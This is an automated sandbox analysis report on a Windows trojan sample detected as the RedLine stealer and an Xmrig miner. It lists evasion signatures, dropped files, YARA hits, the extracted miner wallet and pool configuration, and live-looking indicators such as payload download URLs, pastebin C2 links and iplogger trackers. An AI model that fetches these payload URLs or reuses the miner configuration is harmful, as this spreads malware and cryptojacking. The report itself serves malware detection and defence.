Analysis Report SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781

Overview

General Information

Sample Name: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.7781 (renamed file extension from 7781 to exe)
Analysis ID: 356837
MD5: bc584a3be92cfdfda79446372fffa46d
SHA1: 6f7d11b7c795bd1f48a078f05d8a4c5600448a03
SHA256: 8086d2b05316a9b44f55971a6c90da8ecb069d075973654f5f914229dc3070f6

Detection

RedLine Xmrig
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Xmrig
Yara detected RedLine Stealer
Yara detected Xmrig cryptocurrency miner
Binary contains a suspicious time stamp
Connects to a pastebin service (likely for C&C)
Detected Stratum mining protocol
Found strings related to Crypto-Mining
Hides threads from debuggers
Machine Learning detection for dropped file
May check the online IP address of the machine
PE file contains section with special chars
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample is not signed and drops a device driver
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Uses schtasks.exe or at.exe to add and modify task schedules
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates driver files
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Enables debug privileges
Entry point lies outside standard sections
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains more sections than normal
PE file contains sections with non-standard names
PE file contains strange resources
Queries the volume information (name, serial number, etc.) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Classification

AV Detection:

Antivirus detection for URL or domain
Source: https://blog.agencia10x.com/dance.exe Avira URL Cloud: Label: malware
Source: https://blog.agencia10x.com/mex.exe Avira URL Cloud: Label: malware
Found malware configuration
Source: cpu.exe.6624.16.memstr Malware Configuration Extractor: Xmrig {"WALLET": "42ZYH6myZTcdLqfmCpSCggN8ppdku4PK16kH8UFFyTesddFwT5ihd2QFsWS2BGnuwXWfnrtbJbr5w7dqgeBRZDJcUzia53j", "POOL": "pool.minexmr"}
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Metadefender: Detection: 21%
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Local\zmql3v0y.exe ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe Metadefender: Detection: 16%
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe ReversingLabs: Detection: 65%
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe ReversingLabs: Detection: 60%
Multi AV Scanner detection for submitted file
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Metadefender: Detection: 21%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe ReversingLabs: Detection: 28%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Joe Sandbox ML: detected

Bitcoin Miner:

Yara detected Xmrig cryptocurrency miner
Source: Yara match File source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000002.328721362.0000000003CD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000003.324849643.0000020FCC35B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.282484459.0000000001AC0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000F.00000003.317443395.00000000015F0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.318537012.0000000003391000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: cpu.exe PID: 6624, type: MEMORY
Source: Yara match File source: Process Memory Space: zmql3v0y.exe PID: 4012, type: MEMORY
Source: Yara match File source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\Windows\CPU\config.json, type: DROPPED
Source: Yara match File source: 6.2.zmql3v0y.exe.b30000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 15.2.RantimeBroker.exe.d80000.0.unpack, type: UNPACKEDPE
Detected Stratum mining protocol
Source: global traffic TCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444 payload: {"id":1,"jsonrpc":"2.0","method":"login","params":{"login":"42zyh6myztcdlqfmcpscggn8ppdku4pk16kh8uffytesddfwt5ihd2qfsws2bgnuwxwfnrtbjbr5w7dqgebrzdjcuzia53j./","pass":"x","agent":"xmrig/6.8.0 (windows nt 10.0; win64; x64) libuv/1.40.0 msvc/2019","algo":["cn/r","cn/2","cn/1","cn/fast","cn/half","cn/xao","cn/rto","cn/rwz","cn/zls","cn/double","cn-lite/1","cn-heavy/0","cn-heavy/tube","cn-heavy/xhv","cn-pico","cn-pico/tlo","cn/ccx","rx/0","rx/wow","rx/arq","rx/sfx","rx/keva","argon2/chukwa","argon2/chukwav2","argon2/wrkz","astrobwt"]}}.
Found strings related to Crypto-Mining
Source: zmql3v0y.exe String found in binary or memory: -o stratum+tcp://
Source: zmql3v0y.exe String found in binary or memory: pool.minexmr.com:4444

Compliance:

Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Uses secure TLS version for HTTPS connections
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2
Binary contains paths to debug symbols
Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278594567.00000000002F0000.00000040.00020000.sdmp, zmql3v0y.exe, 00000006.00000002.520873342.0000000000B40000.00000040.00020000.sdmp, RantimeBroker.exe, 0000000F.00000002.319896827.0000000000D90000.00000040.00020000.sdmp
Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: WinRing0x64.sys.6.dr

Networking:

Connects to a pastebin service (likely for C&C)
Source: unknown DNS query: name: pastebin.com
May check the online IP address of the machine
Source: unknown DNS query: name: iplogger.org
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.5:49731 -> 88.99.193.240:4444
HTTP GET or POST without a user agent
Source: global traffic HTTP traffic detected: GET /cpu.zip HTTP/1.1 Host: 195.2.84.91 Connection: Keep-Alive
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 104.23.99.190 104.23.99.190
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknown TCP traffic detected without corresponding DNS query: 195.2.84.91
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OK Server: nginx Date: Tue, 23 Feb 2021 16:37:53 GMT Content-Type: application/zip Content-Length: 6296834 Connection: keep-alive Keep-Alive: timeout=60 Last-Modified: Sat, 20 Feb 2021 21:11:22 GMT ETag: "601502-5bbcb02b93280" Accept-Ranges: bytes
Source: global traffic HTTP traffic detected: GET /cpu.zip HTTP/1.1 Host: 195.2.84.91 Connection: Keep-Alive
Source: unknown DNS traffic detected: queries for: iplogger.org
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp String found in binary or memory: http://195.2.84.91/amd.zip
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp String found in binary or memory: http://195.2.84.91/cpu.zip
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp String found in binary or memory: http://195.2.84.91/nvidia.zip
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: http://cacerts.digicert.com/CloudflareIncECCCA-3.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceCodeSigningCA-1.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: WinRing0x64.sys.6.dr String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: pg2bsuqa.exe.0.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: http://crl3.digicert.com/CloudflareIncECCCA-3.crl07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp String found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0m
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl3.digicert.com/ha-cs-2011a.crl0.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: http://crl4.digicert.com/CloudflareIncECCCA-3.crl0L
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://crl4.digicert.com/ha-cs-2011a.crl0L
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0#
Source: pg2bsuqa.exe.0.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.com
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: http://ocsp.digicert.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280945530.0000000001122000.00000004.00000020.sdmp String found in binary or memory: http://ocsp.digicert.com0:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ocsp.digicert.com0H
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ocsp.digicert.com0I
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ocsp.digicert.com0P
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp, pg2bsuqa.exe.0.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ocsp.thawte.com0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://s.symcb.com/universal-root.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://s.symcd.com06
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-aia.ws.symantec.com/sha256-tss-ca.cer0(
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-crl.ws.symantec.com/sha256-tss-ca.crl0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://ts-ocsp.ws.symantec.com0;
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.com/dance.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.com/dance.exed
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.com/mex.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.com4
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283892138.0000000003346000.00000004.00000001.sdmp String found in binary or memory: https://blog.agencia10x.comD8
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: https://d.symcb.com/cps0%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: https://d.symcb.com/rpa0
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: https://d.symcb.com/rpa0.
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: https://iplogger.org/1r2et7
Source: zmql3v0y.exe, zmql3v0y.exe, 00000006.00000002.520808342.0000000000B32000.00000020.00020000.sdmp, RantimeBroker.exe, RantimeBroker.exe, 0000000F.00000002.319692642.0000000000D82000.00000020.00020000.sdmp String found in binary or memory: https://iplogger.org/1tsef7
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/WmBNYXYN
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283685326.0000000003281000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com/raw/bnxCb5RP
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.278531237.00000000002E2000.00000020.00020000.sdmp String found in binary or memory: https://pastebin.com/raw/bnxCb5RPChttps://pastebin.com/raw/WmBNYXYN
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283839555.00000000032C8000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.com4
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp String found in binary or memory: https://pastebin.comD8
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283866896.000000000331A000.00000004.00000001.sdmp, SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.283801731.00000000032C0000.00000004.00000001.sdmp String found in binary or memory: https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.281148761.0000000001165000.00000004.00000020.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: pg2bsuqa.exe.0.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe String found in binary or memory: https://www.digicert.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49730
Source: unknown Network traffic detected: HTTP traffic on port 49730 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 104.23.99.190:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 172.67.213.210:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 88.99.66.31:443 -> 192.168.2.5:49730 version: TLS 1.2

System Summary:

PE file contains section with special chars
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name:
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: section name:
Source: pg2bsuqa.exe.0.dr Static PE information: section name:
Source: pg2bsuqa.exe.0.dr Static PE information: section name:
Source: pg2bsuqa.exe.0.dr Static PE information: section name:
Source: zmql3v0y.exe.0.dr Static PE information: section name:
Source: zmql3v0y.exe.0.dr Static PE information: section name:
Source: zmql3v0y.exe.0.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Source: RantimeBroker.exe.6.dr Static PE information: section name:
Creates driver files
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File created: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys
Detected potential crypto function
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Code function: 4_2_003D1D30
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Code function: 4_2_003D4928
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\pg2bsuqa.exe 1D1F06C0D0965296755770B3F6A70A90E0D21A57EF5E47F9A26FCC4008AD45EF
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Local\zmql3v0y.exe 83F953427624EABA72E6D34339B4004C3614657BFE9FB601ECA7E76410B71325
Source: Joe Sandbox View Dropped File: C:\Users\user\AppData\Roaming\Windows\CPU\WinRing0x64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5
PE / OLE file has an invalid certificate
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: invalid certificate
PE file contains more sections than normal
Source: pg2bsuqa.exe.0.dr Static PE information: Number of sections : 11 > 10
Source: cpu.exe.6.dr Static PE information: Number of sections : 13 > 10
PE file contains strange resources
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: pg2bsuqa.exe.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: cpu.exe.6.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Binary or memory string: OriginalFilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284152284.0000000005420000.00000002.00000001.sdmp Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000003.237103950.0000000000F40000.00000004.00000001.sdmp Binary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.284646419.0000000006030000.00000002.00000001.sdmp Binary or memory string: System.OriginalFileName vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmp Binary or memory string: originalfilename vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.285071162.0000000006340000.00000002.00000001.sdmp Binary or memory string: OriginalFilenamepropsys.dll.mui@ vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe, 00000000.00000002.280825476.0000000001100000.00000004.00000020.sdmp Binary or memory string: OriginalFilenameclr.dllT vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Binary or memory string: OriginalFilenameLoader.exe, vs SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe
Uses 32bit PE files
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Yara signature match
Source: 00000010.00000002.547615511.0000020FCC320000.00000004.00000020.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000010.00000002.547631429.0000020FCC328000.00000004.00000020.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: 00000010.00000002.547665443.0000020FCC34B000.00000004.00000020.sdmp, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: Process Memory Space: RantimeBroker.exe PID: 6552, type: MEMORY Matched rule: CoinMiner_Strings date = 2018-01-04, author = Florian Roth, description = Detects mining pool protocol string in Executable, license = https://creativecommons.org/licenses/by-nc/4.0/, score = https://minergate.com/faq/what-pool-address
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Static PE information: Section: ZLIB complexity 0.989800347222
Source: WinRing0x64.sys.6.dr Binary string: \Device\WinRing0_1_2_0
Source: classification engine Classification label: mal100.troj.evad.mine.winEXE@13/9@9/5
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File created: C:\Users\user\AppData\Local\pg2bsuqa.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6664:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6492:120:WilError_01
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Mutant created: \Sessions\1\BaseNamedObjects\3d8f939a-7191-48a7-9jo8-2cc28dtec736
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\pg2bsuqa.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\RantimeBroker.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe File read: C:\Windows\System32\drivers\etc\hosts (4 reads) Jump to behavior
Source: C:\Users\user\AppData\Local\zmql3v0y.exe File read: C:\Windows\System32\drivers\etc\hosts (2 reads) Jump to behavior
Source: C:\Users\user\AppData\Roaming\Windows\CPU\cpu.exe File read: C:\Windows\System32\drivers\etc\hosts (2 reads) Jump to behavior
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe Metadefender: Detection: 21%
Source: SecuriteInfo.com.Trojan.GenericKD.45754886.17334.exe ReversingLabs: Detection: 28%
